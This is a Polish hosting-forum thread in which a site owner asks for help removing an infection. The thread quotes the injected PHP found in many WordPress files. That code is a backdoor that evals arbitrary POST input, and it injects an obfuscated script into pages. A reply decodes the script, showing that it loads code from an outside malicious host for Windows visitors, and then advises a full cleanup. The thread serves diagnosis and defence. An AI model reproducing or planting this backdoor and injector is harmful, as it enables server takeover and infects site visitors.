x-kom hosting

Wirus na stronie

Jedik
utworzono
utworzono (edytowane)

Przez chwile nieuwagi złapałem wirusa na twardziela, nieświadomy tego trochę pogrzebałem w plikach na stronie i... zonk!

Jak sie wejdzie na strone to wyskakuje komunikat w avascie (ktorego uzywam).

Probowalem go usunac, zgralem strone na dysk, wyczyscilem moje miejsce na stronie (kilka folderow i plikow nie moglem usunac, nie wiem czemu) i przeskanowalem dokladnie ad-aware i avastem. Oba cos znalazly, usunalem wirusa z plikow strony na komputerze. Tylko jak je zgram spowrotem uzywajac total commandera, dalej wyskakuje komunikat o wirusie. Zmienilem haslo w index.php. Probowalem tez recznie usunac zarazone pliki... Nic, nie mam juz pomyslow, prosilbym o pomoc kogos bardziej doswiadczonego.

Z gory dzieki!

PS. pliki ktore nie chcialy sie usunac (jeden plik .css i 5 pustych folderow) nie wygladaly na zarazone, po zgraniu na dysk avast i ad aware nic w nich nie wykryly).

@edit

W kodzie strony znalazlem takie cos

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih4aEkpe3ZhciB4cHQ9KCd2YXIiMjAiNjEiM2QiMjJTIjYzIjcyaXB0RSI2ZWdpIjZlZSIyMiIyY2IiM2QiMjIiNTYiNjUiNzJzaW8iNmUoKSsiMjIiMmNqIjNkIjIyIjIyIjJjdSIzZCI2ZWF2aWdhdG9yIjJldSI3M2VyQWciNjVudCIzYmlmKCgiNzUiMmVpIjZlZGV4T2YoIjIyVyI2OW4iMjIpIjNlIjMwKSIyNiIyNiIyOCI3NSIyZWluZGV4T2YoIjIyTlQiMjA2IjIyKSIzYzApIjI2IjI2KCI2NG8iNjN1bWUiNmV0IjJlY29vIjZiaWUiMmUiNjluZGV4TyI2NigiMjIiNmRpZWsiM2QxIjIyKSIzYzAiMjkiMjYiMjYodHlwIjY1IjZmZih6cnYiN2F0cyIyOSIyMSIzZHQiNzlwZSI2ZiI2NigiMjJBIjIyKSkpIjdienJ2enRzIjNkIjIyQSIyMiIzYmUiNzZhbCIyOCIyMmkiNjYoIjc3aW5kb3ciMmUiMjIrYSsiMjIpIjZhIjNkaiIyYiIyMithKyIyMk0iNjFqb3IiMjIrYiIyYmErIjIyTWlub3IiMjIrIjYyK2ErIjIyQnVpIjZjZCIyMitiKyIyMmoiM2IiMjIpIjNiZG9jdW1lbnQiMmV3cml0ZSgiMjIiM2NzY3JpcHQiMjAiNzNyYyIzZCIyZiIyZmd1IjZkYmxhciIyZWMiNmUiMmZycyI3MyIyZiIzZmlkIjNkIjIyKyI2YSsiMjIiM2UiM2MiNWMiMmZzY3JpcHQiM2UiMjIpIjNiIjdkJykucmVwbGFjZSh4aEksJyUnKTtldmFsKHVuZXNjYXBlKHhwdCkpfSkoLyIvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php/** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */

czy czasem to od if(!function_exists('tmp_lkojfghx')) ... to nie jest wirus? Tego tutaj wczesniej nie bylo, przeszukalem pliki.. i w ponad 50 jest taki kod... usune go z kazdego i zobacze co sie stanie.

  • 2 tygodnie później...

Conra
komentarz
komentarz

To jest zakodowany tekst w base64

<script language=javascript><!--

(function(xhI){var xpt=('var"20"61"3d"22S"63"72iptE"6egi"6ee"22"2cb"3d"22"56"65"72sio"6e()+"22"2cj"3d"22"22"2cu"3d"6eavigator"2eu"73erAg"65nt"3bif(("75"2ei"6edexOf("22W"69n"22)"3e"30)"26"26"28"75"2eindexOf("22NT"206"22)"3c0)"26"26("64o"63ume"6et"2ecoo"6bie"2e"69ndexO"66("22"6diek"3d1"22)"3c0"29"26"26(typ"65"6ff(zrv"7ats"29"21"3dt"79pe"6f"66("22A"22)))"7bzrvzts"3d"22A"22"3be"76al"28"22i"66("77indow"2e"22+a+"22)"6a"3dj"2b"22+a+"22M"61jor"22+b"2ba+"22Minor"22+"62+a+"22Bui"6cd"22+b+"22j"3b"22)"3bdocument"2ewrite("22"3cscript"20"73rc"3d"2f"2fgu"6dblar"2ec"6e"2frs"73"2f"3fid"3d"22+"6a+"22"3e"3c"5c"2fscript"3e"22)"3b"7d').replace(xhI,'%');eval(unescape(xpt))})(/"/g);

--></script>

Ciężka sprawa, daj komuś dostęp do bazy danych, komuś kto się zna. Następnie niech ten ktoś wyciągnie bazę (backup), wywalić wszystko z serwera (jak masz jakiś panel typu DA lub cPanel to z niego wykasować cały katalog/wszystkie pliki/wywalić domenę i dodać ją ponownie. Jest duże prawdopodobieństwo, że ten śmieć rozpanoszył się po innych katalogach więc musisz to sprawdzić, albo ktoś inny niech sprawdzi (ktoś bez wirusa).

Jak coś to pisz (kontakt w portfolio http://conra.iphp.pl )

Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!

Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Strona wykorzystuje pliki cookies w celu prawidłowego świadczenia usług i wygody użytkowników. Warunki przechowywania i dostępu do plików cookies możesz zmienić w ustawieniach przeglądarki.